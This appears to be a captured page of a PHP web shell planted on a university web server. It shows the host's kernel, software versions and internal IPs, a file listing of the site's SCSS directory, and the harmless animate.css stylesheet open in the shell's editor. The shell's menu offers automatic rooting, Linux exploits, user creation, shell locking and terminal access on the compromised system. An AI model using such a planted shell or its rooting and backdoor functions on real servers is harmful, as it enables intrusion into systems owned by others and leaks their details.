Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
scss /
free /
[ HOME SHELL ]
Name
Size
Permission
Action
modules
[ DIR ]
drwxrwxr-x
_animations-basic.scss
2.54
KB
-rwxrwxr-x
_badges.scss
335
B
-rwxrwxr-x
_buttons.scss
3.2
KB
-rwxrwxr-x
_cards.scss
580
B
-rwxrwxr-x
_carousels.scss
1.18
KB
-rwxrwxr-x
_depreciated.scss
48
B
-rwxrwxr-x
_dropdowns.scss
144
B
-rwxrwxr-x
_footers.scss
314
B
-rwxrwxr-x
_forms.scss
13.31
KB
-rwxrwxr-x
_input-group.scss
414
B
-rwxrwxr-x
_list-group.scss
557
B
-rwxrwxr-x
_loader.scss
177
B
-rwxrwxr-x
_modals.scss
6.35
KB
-rwxrwxr-x
_msc.scss
3.17
KB
-rwxrwxr-x
_navbars.scss
2.73
KB
-rwxrwxr-x
_pagination.scss
1.91
KB
-rwxrwxr-x
_steppers.scss
3.8
KB
-rwxrwxr-x
_switch.scss
894
B
-rwxrwxr-x
_tables.scss
1.36
KB
-rwxrwxr-x
_treeview.scss
418
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _animations-basic.scss
/*! * animate.css -http://daneden.me/animate * Version - 3.7.0 * Licensed under the MIT license - http://opensource.org/licenses/MIT * * Copyright (c) 2018 Daniel Eden */ .animated { animation-duration: 1s; animation-fill-mode: both; &.infinite { animation-iteration-count: infinite; } &.delay-1s { animation-delay: 1s; } &.delay-2s { animation-delay: 2s; } &.delay-3s { animation-delay: 3s; } &.delay-4s { animation-delay: 4s; } &.delay-5s { animation-delay: 5s; } &.fast { animation-duration: 800ms; } &.faster { animation-duration: 500ms; } &.slow { animation-duration: 2s; } &.slower { animation-duration: 3s; } } @media (prefers-reduced-motion) { .animated { animation: unset !important; transition: none !important; } } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } .fadeIn { animation-name: fadeIn; } @keyframes fadeInDown { from { opacity: 0; transform: translate3d(0, -100%, 0); } to { opacity: 1; transform: translate3d(0, 0, 0); } } .fadeInDown { animation-name: fadeInDown; } @keyframes fadeInLeft { from { opacity: 0; transform: translate3d(-100%, 0, 0); } to { opacity: 1; transform: translate3d(0, 0, 0); } } .fadeInLeft { animation-name: fadeInLeft; } @keyframes fadeInRight { from { opacity: 0; transform: translate3d(100%, 0, 0); } to { opacity: 1; transform: translate3d(0, 0, 0); } } .fadeInRight { animation-name: fadeInRight; } @keyframes fadeInUp { from { opacity: 0; transform: translate3d(0, 100%, 0); } to { opacity: 1; transform: translate3d(0, 0, 0); } } .fadeInUp { animation-name: fadeInUp; } @keyframes fadeOut { from { opacity: 1; } to { opacity: 0; } } .fadeOut { animation-name: fadeOut; } @keyframes fadeOutDown { from { opacity: 1; } to { opacity: 0; transform: translate3d(0, 100%, 0); } } .fadeOutDown { animation-name: fadeOutDown; } @keyframes fadeOutLeft { from { opacity: 1; } to { opacity: 0; transform: translate3d(-100%, 0, 0); } } .fadeOutLeft { animation-name: fadeOutLeft; } @keyframes fadeOutRight { from { opacity: 1; } to { opacity: 0; transform: translate3d(100%, 0, 0); } } .fadeOutRight { animation-name: fadeOutRight; } @keyframes fadeOutUp { from { opacity: 1; } to { opacity: 0; transform: translate3d(0, -100%, 0); } } .fadeOutUp { animation-name: fadeOutUp; }
Close